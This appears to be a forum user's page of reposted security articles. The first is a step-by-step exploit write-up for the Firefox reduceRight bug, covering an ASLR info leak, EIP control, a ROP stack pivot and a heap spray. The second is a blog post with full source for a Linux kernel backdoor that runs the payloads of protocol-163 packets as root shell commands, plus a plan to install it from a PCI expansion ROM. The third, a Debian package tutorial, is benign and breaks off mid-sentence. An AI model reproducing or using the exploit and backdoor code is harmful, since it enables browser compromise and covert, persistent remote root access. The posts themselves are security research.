Everything posted by Nytro

  1. [h=2]Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules[/h]22/02/2012 p_k CVE-2011-2371 (found by Chris Rohlf and Yan Ivnitskiy) is a bug in Firefox versions <= 4.0.1. It has an interesting property of being a code-exec and an info-leak bug at the same time. Unfortunately, all public exploits targeting this vulnerability rely on non-ASLR modules (like those present in Java). In this post I’ll show how to exploit this vulnerability on Firefox 4.0.1/Windows 7, by leaking the image base of one of Firefox’s modules, thus circumventing ASLR without any additional dependencies. [h=2]The bug[/h] You can see the original bug report with detailed analysis here. To make a long story short, this is the trigger: xyz = new Array; xyz.length = 0x80100000; a = function foo(prev, current, index, array) { current[0] = 0x41424344; } xyz.reduceRight(a,1,2,3); Executing it crashes Firefox: eax=0454f230 ebx=03a63da0 ecx=800fffff edx=01c6f000 esi=0012cd68 edi=0454f208 eip=004f0be1 esp=0012ccd0 ebp=0012cd1c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mozjs!JS_FreeArenaPool+0x15e1: 004f0be1 8b14c8 mov edx,dword ptr [eax+ecx*8] ds:0023:04d4f228=?????? eax holds a pointer to the “xyz” array and ecx is equal to xyz.length-1. reduceRight visits all elements of the given array in reverse order, so if the read @ 004f0be1 succeeds and we don’t crash inside the callback function (foo), the JS interpreter will loop the above code with decreasing values in ecx. The value read @ 004f0be1 is passed to foo() as the “current” argument. This means we can trick the JS interpreter into passing random stuff from the heap to our javascript callback. Notice we fully control the array’s length, and since ecx is multiplied by 8 (bitshifted left by 3 bits), we can access memory before or after the array, by setting/clearing the 29th bit of the length. Neat. During reduceRight(), the interpreter expects jsval_layout unions: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 274 typedef union jsval_layout 275 { 276 uint64 asBits; 277 struct { 278 union { 279 int32 i32; 280 uint32 u32; 281 JSBool boo; 282 JSString *str; 283 JSObject *obj; 284 void *ptr; 285 JSWhyMagic why; 286 jsuword word; 287 } payload; 288 JSValueTag tag; 289 } s; 290 double asDouble; 291 void *asPtr; 292 } jsval_layout; To be more specific, we are interested in the “payload” struct. Possible values for “tag” are: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 92 JS_ENUM_HEADER(JSValueType, uint8) 93 { 94 JSVAL_TYPE_DOUBLE = 0x00, 95 JSVAL_TYPE_INT32 = 0x01, 96 JSVAL_TYPE_UNDEFINED = 0x02, 97 JSVAL_TYPE_BOOLEAN = 0x03, 98 JSVAL_TYPE_MAGIC = 0x04, 99 JSVAL_TYPE_STRING = 0x05, 100 JSVAL_TYPE_NULL = 0x06, 101 JSVAL_TYPE_OBJECT = 0x07, ... 119 JS_ENUM_HEADER(JSValueTag, uint32) 120 { 121 JSVAL_TAG_CLEAR = 0xFFFF0000, 122 JSVAL_TAG_INT32 = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32, 123 JSVAL_TAG_UNDEFINED = JSVAL_TAG_CLEAR | JSVAL_TYPE_UNDEFINED, 124 JSVAL_TAG_STRING = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING, 125 JSVAL_TAG_BOOLEAN = JSVAL_TAG_CLEAR | JSVAL_TYPE_BOOLEAN, 126 JSVAL_TAG_MAGIC = JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC, 127 JSVAL_TAG_NULL = JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL, 128 JSVAL_TAG_OBJECT = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT 129 } JS_ENUM_FOOTER(JSValueTag); Does this mean we can only read the first dwords of pairs (d1,d2), where d2=JSVAL_TAG_INT32 or d2=JSVAL_TYPE_DOUBLE? Fortunately for us, no. 
Observe how the interpreter checks if a jsval_layout is a number: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 405 static JS_ALWAYS_INLINE JSBool 406 JSVAL_IS_NUMBER_IMPL(jsval_layout l) 407 { 408 JSValueTag tag = l.s.tag; 409 JS_ASSERT(tag != JSVAL_TAG_CLEAR); 410 return (uint32)tag <= (uint32)JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET; So any pair of dwords (d1, d2), with d2<=JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET (which is equal to JSVAL_TAG_INT32) is interpreted as a number. This isn’t the end of the good news; check how doubles are recognized: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 369 static JS_ALWAYS_INLINE JSBool 370 JSVAL_IS_DOUBLE_IMPL(jsval_layout l) 371 { 372 return (uint32)l.s.tag <= (uint32)JSVAL_TAG_CLEAR; 373 } This means that any pair (d1,d2) with d2<=0xffff0000 is interpreted as a double-precision floating point number. It’s a clever way of saving space, since doubles with all bits of the exponent set and nonzero mantissa are NaNs anyway, so rejecting doubles greater than 0xffff000000000000 isn’t really a problem — we are just throwing out NaNs. [h=2]Leaking the image base[/h] Knowing that most of the values read off the heap are interpreted as doubles in our javascript callback (function foo above), we can use a library like JSPack to decode them to byte sequences. var leak_func = function bleh(prev, current, index, array) { if(typeof current == "number"){ mem.push(current); //decode with JSPack later } count += 1; if(count>=CHUNK_SIZE/8){ throw "lol"; //stop dumping } } Notice that we are verifying the type of “current”. It’s necessary because if we encounter a jsval_value of type OBJECT, manipulating it later will cause an undesired crash. Having a chunk of memory, we still need to comb it for values revealing the image base of mozjs.dll (that’s the module implementing reduceRight). Good candidates are pointers to functions in the .code section, or pointers to data structures in .data, but how do we find them? After all, they change with every run, because of the varying image base. By examining dumped memory manually, I noticed it’s always possible to find a pair of pointers (with fixed RVAs) to the .data section, differing by a constant (0x304), so a simple algorithm is to sequentially scan pairs of dwords, check if their difference is 0x304 and use their (known) RVAs to calculate mozjs’ image base (image_base = ptr_va - ptr_rva). It’s a heuristic, but it works 100% of the time. [h=2]Taking control[/h] Assume we are able to pass a controlled jsval_layout with tag=JSVAL_TYPE_OBJECT to our JS callback. Here’s what happens after executing “current[0]=1” if the “payload.ptr” field points to an area filled with \x88: eax=00000001 ebx=00000009 ecx=40000004 edx=00000009 esi=055101b0 edi=88888888 eip=655301a9 esp=0048c2a0 ebp=13801000 iopl=0 ov up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06 mozjs!js::mjit::stubs::SetElem<0>+0xf9: 655301a9 8b4764 mov eax,dword ptr [edi+64h] ds:002b:888888ec=???????? 0:000> k ChildEBP RetAddr 0048c308 6543fc4c mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...js\src\methodjit\stubcalls.cpp @ 567] 0048c334 65445d99 mozjs!js::InvokeSessionGuard::invoke+0x13c [...\js\src\jsinterpinlines.h @ 619] 0048c418 65445fa6 mozjs!array_extra+0x3d9 [...\js\src\jsarray.cpp @ 2857] 0048c42c 65485221 mozjs!array_reduceRight+0x16 [...\js\src\jsarray.cpp @ 2932] We are using \x88 as a filler, so that every pointer taken from that area is equal to 0x88888888. 
Since the highest bit is set (and the pointer points to kernel space), every dereference will cause a crash and we will notice it under a debugger. Using low values, like 0x0c, as a filler during exploit development can make us miss crashes, if 0x0c0c0c0c happens to be mapped. It seems like we can control the value of edi. Let’s see if it’s of any use: 0:000> u eip l10 mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...\js\src\methodjit\stubcalls.cpp @ 567]: 655301a9 8b4764 mov eax,dword ptr [edi+64h] 655301ac 85c0 test eax,eax 655301ae 7505 jne mozjs!js::mjit::stubs::SetElem<0>+0x105 (655301b5) 655301b0 b830bb4965 mov eax,offset mozjs!js_SetProperty (6549bb30) 655301b5 8b54241c mov edx,dword ptr [esp+1Ch] 655301b9 6a00 push 0 655301bb 8d4c2424 lea ecx,[esp+24h] 655301bf 51 push ecx 655301c0 53 push ebx 655301c1 55 push ebp 655301c2 52 push edx 655301c3 ffd0 call eax 655301c5 83c414 add esp,14h 655301c8 85c0 test eax,eax That’s exactly what we need — the value from [edi+64h] (edi is controlled) is a function pointer called @ 655301c3. Where does the edi value come from? 0:000> u eip-72 l10 mozjs!js::mjit::stubs::SetElem<0>+0x87 [...\js\src\methodjit\stubcalls.cpp @ 552]: 65530137 8b7d04 mov edi,dword ptr [ebp+4] 6553013a 81ffb05f5e65 cmp edi,offset mozjs!js_ArrayClass (655e5fb0) 65530140 8b5c2414 mov ebx,dword ptr [esp+14h] 65530144 7563 jne mozjs!js::mjit::stubs::SetElem<0>+0xf9 (655301a9) edi=[ebp+4], where ebp is equal to payload.ptr in our jsval_layout union. It’s now easy to see how to control EIP. Trigger SetElem on a controlled jsval_layout union (by executing “current[0]=1” in the JS callback of reduceRight), with tag=JSVAL_TYPE_OBJECT, and ptr=PTR_TO_CONTROLLED_MEM, where [CONTROLLED_MEM+4]=NEW_EIP. Easy. Since ASLR is not an issue (we already have mozjs’ image base) we can circumvent DEP with return oriented programming. With mona.py it’s very easy to generate a ROP chain that will allocate a RWX memory chunk. From that chunk, we can run our “normal” shellcode, without worrying about DEP. !mona rop -m "mozjs" -rva “-m” restricts the search to just mozjs.dll (that’s the only module with a known image base) “-rva” generates a chain parametrized by the module’s image base. I won’t paste the output, but mona is able to find a chain that uses VirtualAlloc to change memory permissions to RWX. There’s only one problem. In order to use that chain, we need to control the stack. During the call @ 655301c3, we don’t. Fortunately, we do control EBP, which is equal to the layout.ptr field in our fake object. The first idea is to use any function’s epilogue: mov esp, ebp pop ebp ret as a pivot, but notice that RET will transfer control to an address stored in [ebp+4], and since: 65530137 8b7d04 mov edi,dword ptr [ebp+4] that would mean [ebp+4] has to be both a return address and a pointer to a function pointer called later @ 655301c3. We have to modify EBP before copying it to ESP. Noticing that during SetElem, the property’s id is passed in EBX as 2*id+1 (when executing “current[id] = …”), it’s easy to pick a good gadget: // 0x68e7a21c, mozjs.dll // found with mona.py ADD EBP,EBX PUSH DS POP EDI POP ESI POP EBX MOV ESP,EBP //(1) POP EBP //(2) RETN This will offset EBP by a controlled ODD value. Unicode strings in JS use two-byte characters, so it’s better to have EBP aligned to 2. We can realign ESP by pivoting again with the new EBP value popped @ (2) and executing the same gadget from line (1). 
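To make that realignment step concrete, here is a small arithmetic sketch, not from the original post and using made-up addresses: SetElem carries the property id in EBX as 2*id+1, so the gadget's ADD EBP,EBX always moves EBP by an odd amount, and it is the second pass through MOV ESP,EBP / POP EBP that lands the stack on the 2-aligned value stored inside the fake object.

# Hypothetical values; only the arithmetic matters here.
def ebx_during_setelem(prop_id):
    # While the callback runs "current[id] = ...", SetElem carries the
    # property id in EBX encoded as 2*id + 1, i.e. always an odd number.
    return 2 * prop_id + 1

fake_object = 0x0C0C1000                               # layout.ptr, which becomes EBP
ebp_after_add = fake_object + ebx_during_setelem(4)    # ADD EBP,EBX: odd, misaligned
new_ebp = 0x0C0C1010                                   # 2-aligned value inside the fake
                                                       # object, loaded by the POP EBP at (2)
# Re-running the gadget from (1) then executes MOV ESP,EBP with EBP = new_ebp,
# so the ROP chain runs from a properly aligned stack.
print(hex(ebp_after_add), hex(new_ebp))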
This is how our fake object has to look (the original ASCII diagram, reduced to its byte offsets): pivot_va at offset 0; ptr at offset 4, pointing back into the object itself; then 00, new_ebp, mov_esp_ebp, 00 at offsets 8, 9, 13 and 17; new_ebp2 at offset 18; and the ROP chain followed by the normal shellcode from offset 22 onwards. pivot_va – address of the gadget above new_ebp – value popped at (2) used to realign the stack to 2 mov_esp_ebp – address of (1) new_ebp2 – new value of EBP after executing (2) for the second time, not used ROP – generated ROP chain changing memory perms normal shellcode – message box shellcode by Skylined [h=2]Spraying[/h] Here’s a nice diagram (asciiflow FTW) describing how we are going to arrange (or attempt to arrange) things in memory: [diagram: at low addresses, the first half of the spray, made of repeated (ptr, 0xffff0007) pairs, each ptr pointing down into the second half; after the end of half1, a margin of error; then the fake objects, towards high addresses.] Our spray will consist of two regions. The first one will be filled with jsval_layout unions, with tag=0xffff0007 (JSVAL_TYPE_OBJECT) and ptr pointing to the second region, filled with the fake objects described above. If you run the PoC exploit on Windows XP, this is (most likely) how the heap is going to look: Zooming into one of the 1MB chunks: Notice how our payload is aligned to a 4KB boundary. This is because of how the spray is implemented: unicode strings are stored in an array. The beginning of the array is used to store metadata, and the actual data starts @ +4KB. It’s also useful to note that older versions of FF have a bug related to rounding allocation sizes and, in effect, allocating too much memory for objects (including strings), so instead of nicely aligned strings in the array, we will get strings interleaved with chunks containing NULL bytes (I’ll explain why this isn’t a problem in a sec.). This is how the fake objects from the second part of the spray look: Four NOPs at the bottom mark the end of mona’s ROP chain. [h=2]Putting it all together[/h] Leak mozjs’ image base, as described above. Spray the heap with JS, as described above. Note where the spray starts in memory, across different OSes. Different versions of the exploit should use OS-specific constants for calculating the array’s length used in reduceRight(). Calculate the length of the array (xyz in the trigger PoC) so that the first dereference should happen in the middle of the first half of the spray. Aiming at the middle gives us the biggest possible margin of error — if the spray’s starting address deviates from the expected value by less than size/2, it shouldn’t affect our exploit. Trigger the bug. Inside the JS callback, trigger SetElem, by executing “current[4]=1”. In case of a JS exception (TypeError: current is undefined), change the array’s length and continue. These exceptions are caused by NULL areas between strings. Encountering them isn’t fatal, because the JS interpreter sees them as “undefined” values and throws us a JS exception, instead of crashing. 
  See a nice messagebox, confirming success. [h=2]Limitations[/h] The PoC exploit assumes (like all other public exploits for this bug) that the heap is not polluted by previous allocations. This is a bit unrealistic, because the most common “use-case” is that the victim clicks a link leading to the exploit, meaning the browser is already running and most likely has many tabs already open. In that situation our spray probably won’t be a continuous chunk of memory, which will lead to problems (crashes). Assuming that the PoC is the first and only page opened in Firefox, the probability of success (running shellcode) depends on how long we need to search for mozjs’ image base. The longer it takes, the more trash gets accumulated on the heap, resulting in more “discontinuities” in the spray region. Get the PoC here. Sursa: Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules | GDTR
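As a companion to the leak described in this post, here is a minimal Python sketch of the two host-side steps: re-encoding the leaked doubles into raw bytes (the JSPack step), and scanning consecutive dwords for the pair that differs by 0x304 to recover mozjs' image base. It is not part of the original PoC, and the RVA value is a placeholder; the real one comes from the targeted mozjs.dll build.

import struct

def doubles_to_bytes(leaked_doubles):
    # Each value the callback pushed into mem[] is one 8-byte chunk of heap.
    return b"".join(struct.pack("<d", d) for d in leaked_doubles)

def find_mozjs_base(dump, pair_rva=0x12345, delta=0x304):
    # pair_rva is a placeholder for the known RVA of the first pointer of
    # the 0x304-apart pair in the mozjs.dll build being targeted.
    count = len(dump) // 4
    dwords = struct.unpack("<%dI" % count, dump[:count * 4])
    for a, b in zip(dwords, dwords[1:]):
        if b - a == delta:
            return a - pair_rva          # image_base = ptr_va - ptr_rva
    return None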
  2. [h=3]Hosting backdoors in hardware[/h]By Ksplice Post Importer on Oct 26, 2010 Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors? In some cases, that may not be enough. In this blog post, we're going to describe how we can gain full control of someone's machine by giving them a piece of hardware which they install into their computer. The backdoor won't leave any trace on the disk, so it won't be eliminated even if the operating system is reinstalled. It's important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed. I'll let you figure out the social engineering side of getting the hardware installed (birthday "present"?), and instead focus on some of the technical details involved. Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We're going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it's mainly just a matter of engineering effort to support a wide range of kernels. [h=3]Modifying the kernel with a kernel module[/h] The easiest way to modify the behavior of our kernel is by loading a kernel module. Let's start by writing a module that will allow us to remotely control a machine. IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We're going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we'll execute its data payload in a shell running as root. This will give us complete remote control of the machine. The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. 
We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this: int exec_packet(struct sk_buff *skb) { char *argv[4] = {"/bin/sh", "-c", skb->data, NULL}; char *envp[1] = {NULL}; call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT); kfree_skb(skb); return 0; } We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded: const struct net_protocol proto163_protocol = { .handler = exec_packet, .no_policy = 1, .netns_ok = 1 }; int init_module(void) { return (inet_add_protocol(&proto163_protocol, 163) < 0); } Let's build and load the module: rwbarton@target:~$ make make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic' CC [M] /home/rwbarton/exec163.o Building modules, stage 2. MODPOST 1 modules CC /home/rwbarton/exec163.mod.o LD [M] /home/rwbarton/exec163.ko make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic' rwbarton@target:~$ sudo insmod exec163.ko Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine: rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip rwbarton@target:~$ ls -l /tmp/x -rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x Great! It worked. Note that we have to send a null-terminated string in the payload, because that's what call_usermodehelper expects to find in argv and we didn't add a terminator in exec_packet. [h=3]Modifying the on-disk kernel[/h] In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we're just going to give a high-level overview of what needs to be done. The kernel lives in the /boot directory; on my test system, it's called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We're going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section. When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us: it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections; it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants; it ran our init_module function. We have to address each of these points in figuring out how to apply our changes without making use of the module loader. The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. 
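One way to do that lookup, sketched below in Python rather than taken from the original post, is to read the addresses straight out of the System.map that ships with the replica kernel (path assumed for this kernel version) and emit them as constants for the patch code; the symbols listed are the ones the exec163 module actually touches.

# Sketch: pull the address constants out of the replica kernel's System.map.
NEEDED = {"kfree_skb", "call_usermodehelper", "inet_add_protocol", "inet_protos"}

def kernel_symbols(path="/boot/System.map-2.6.32-24-generic"):
    addresses = {}
    for line in open(path):
        addr, _type, name = line.split()      # "ffffffff812c3a40 T kfree_skb"
        if name in NEEDED:
            addresses[name] = int(addr, 16)
    return addresses

for name, addr in sorted(kernel_symbols().items()):
    print("#define ADDR_%s 0x%xUL" % (name.upper(), addr))   # constants for the C side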
We can also easily patch the kernel's startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code. The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module's code and data, but we need to make our changes before the kernel has started running, so the memory allocator won't be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we'd still have to find somewhere to store that extra code. What we're going to do is cheat and find some data which isn't used for anything terribly important, and overwrite it with our own data. In general, it's hard to be sure what a given chunk of the kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it's unlikely to ever be triggered. We'll need well under 180 bytes for our data, so let's look for strings in the kernel image which are at least that long: rwbarton@target:~$ strings vmlinux | egrep '^.{180}' | less One of the output lines is this one: <4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file. This sounds pretty obscure to me, and a Google search doesn't find any occurrences of this message which aren't from the kernel source code. So, we're going to just overwrite it with our data. Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don't expect the decompression to fail, because we didn't modify the compressed image at all. So we'll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel. [h=3]Modifying the kernel during the boot process[/h] Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that? The PCI specification defines an "expansion ROM" mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process. When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. 
After loading the master boot record into memory, the BIOS jumps to the beginning of the record. On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO. Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we'll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn't know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we're going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that's just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it. In summary, the boot process of the system with our PCI card inserted looks like this: The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table. The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk. The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB. GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning. GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163]. The startup code of the decompressed kernel runs and installs our handler in inet_protos[163]. The kernel continues to boot normally. We can now control the machine remotely over the Internet by sending it packets with protocol number 163. One neat thing about this setup is that it's not so easy to detect that anything unusual has happened. 
The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all. What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn't realistically worry about installing commodity hardware from reputable vendors. After all, you're already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware. ~rwbarton Sursa: https://blogs.oracle.com/ksplice/entry/hosting_backdoors_in_hardware
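For reference, the protocol-163 control packets that were sent with sendip above can also be produced with a few lines of Python and a raw socket. This is a sketch rather than part of the original post; it needs root on the control machine, and the target IP below is just an example.

import socket

PROTO = 163                          # the unused IP protocol number the module listens on

def send_command(target_ip, command):
    # The handler hands the payload to /bin/sh -c, and call_usermodehelper
    # expects a NUL-terminated string, so append the terminator ourselves.
    payload = command.encode() + b"\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, PROTO)   # requires root
    s.sendto(payload, (target_ip, 0))    # kernel builds the IP header with protocol 163
    s.close()

send_command("192.168.1.123", "touch /tmp/x")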
  3. [h=3]Anatomy of a Debian package[/h][h=4]By Ksplice Post Importer on Oct 06, 2010[/h]Ever wondered what a .deb file actually is? How is it put together, and what's inside it, besides the data that is installed to your system when you install the package? Today we're going to break out our sysadmin's toolbox and find out. (While we could just turn to deb(5), that would ruin the fun.) You'll need a Debian-based system to play along. Ubuntu and other derivatives should work just fine. [h=3]Finding a file to look at[/h] Whenever APT downloads a package to install, it saves it in a package cache, located in /var/cache/apt/archives/. We can poke around in this directory to find a package to look at. spang@sencha:~> cd /var/cache/apt/archives spang@sencha:/var/cache/apt/archives> spang@sencha:/var/cache/apt/archives> ls apache2-utils_2.2.16-2_amd64.deb app-install-data_2010.08.21_all.deb apt_0.8.0_amd64.deb apt_0.8.5_amd64.deb aptitude_0.6.3-3.1_amd64.deb ... nano, the text editor, ought to be a simple package. Let's take a look at that one. spang@sencha:/var/cache/apt/archives> cp nano_2.2.5-1_amd64.deb ~/tmp/blog spang@sencha:/var/cache/apt/archives> cd ~/tmp/blog [h=3]Digging in[/h] Let's see what we can figure out about this file. The file command is a nifty tool that tries to figure out what kind of data a file contains. spang@sencha:~/tmp/blog> file --raw --keep-going nano_2.2.5-1_amd64.deb nano_2.2.5-1_amd64.deb: Debian binary package (format 2.0) - current ar archive - archive file Hmm, so file, which identifies filetypes by performing tests on them (rather than by looking at the file extension or something else cosmetic), must have a special test that identifies Debian packages. Since we passed the command the --keep-going option, though, it continued on to find other tests that match against the file, which is useful because these later matches are less specific, and in our case they tell us what a "Debian binary package" actually is under the hood—an "ar" archive! [h=3]Aside: a little bit of history[/h] Back in the day, in 1995 and before, Debian packages used to use their own ad-hoc archive format. These days, you can find that old format documented in deb-old(5). The new format was added to be "saner and more extensible" than the original. You can still find binaries in the old format on archive.debian.org. You'll see that file tells us that these debs are different; it doesn't know how to identify them in a more specific way than "a bunch of bits": spang@sencha:~/tmp/blog> file --raw --keep-going adduser-1.94-1.deb adduser-1.94-1.deb: data Now we can crack open the deb using the ar utility to see what's inside. [h=3]Inside the box[/h] ar takes an operation code and modifier flags and the archive to act upon as its arguments. The x operation tells it to extract files, and the v modifier tells it to be verbose. spang@sencha:~/tmp/blog> ar vx nano_2.2.5-1_amd64.deb x - debian-binary x - control.tar.gz x - data.tar.gz So, we have three files. [h=4]debian-binary[/h] spang@sencha:~/tmp/blog> cat debian-binary 2.0 This is just the version number of the binary package format being used, so tools know what they're dealing with and can modify their behaviour accordingly. One of file's tests uses the string in this file to add the package format to its output, as we saw earlier. 
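The same unpacking can be scripted. Here is a rough Python sketch of the steps we just did by hand; it shells out to ar and assumes the control.tar.gz/data.tar.gz members seen above (newer packages may ship xz- or zstd-compressed members instead).

import subprocess, tarfile, tempfile, os

def unpack_deb(deb_path):
    # Mirror the manual steps: ar extracts the three members, then tarfile
    # opens the control and data archives.
    workdir = tempfile.mkdtemp()
    subprocess.run(["ar", "x", os.path.abspath(deb_path)], cwd=workdir, check=True)
    print(open(os.path.join(workdir, "debian-binary")).read().strip())   # "2.0"
    with tarfile.open(os.path.join(workdir, "control.tar.gz")) as control:
        print(control.getnames())        # ./control, ./md5sums, maintainer scripts...
    with tarfile.open(os.path.join(workdir, "data.tar.gz")) as data:
        print(data.getnames()[:10])      # first few files installed under /
    return workdir

unpack_deb("nano_2.2.5-1_amd64.deb")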
[h=4]control.tar.gz[/h] spang@sencha:~/tmp/blog> tar xzvf control.tar.gz ./ ./postinst ./control ./conffiles ./prerm ./postrm ./preinst ./md5sums These control files are used by the tools that work with the package and install it to the system—mostly dpkg. [h=5]control[/h] spang@sencha:~/tmp/blog> cat control Package: nano Version: 2.2.5-1 Architecture: amd64 Maintainer: Jordi Mallach Installed-Size: 1824 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info Suggests: spell Conflicts: pico Breaks: alpine-pico (<= 2.00+dfsg-5) Replaces: pico Provides: editor Section: editors Priority: important Homepage: http://www.nano-editor.org/ Description: small, friendly text editor inspired by Pico GNU nano is an easy-to-use text editor originally designed as a replacement for Pico, the ncurses-based editor from the non-free mailer package Pine (itself now available under the Apache License as Alpine). . However, nano also implements many features missing in pico, including: - feature toggles; - interactive search and replace (with regular expression support); - go to line (and column) command; - auto-indentation and color syntax-highlighting; - filename tab-completion and support for multiple buffers; - full internationalization support. This file contains a lot of important metadata about the package. In this case, we have: its name its version number binary-specific information: which architecture it was built for, and how many bytes it takes up after it is installed its relationship to other packages (on the Depends, Suggests, Conflicts, Breaks, and Replaces lines) the person who is 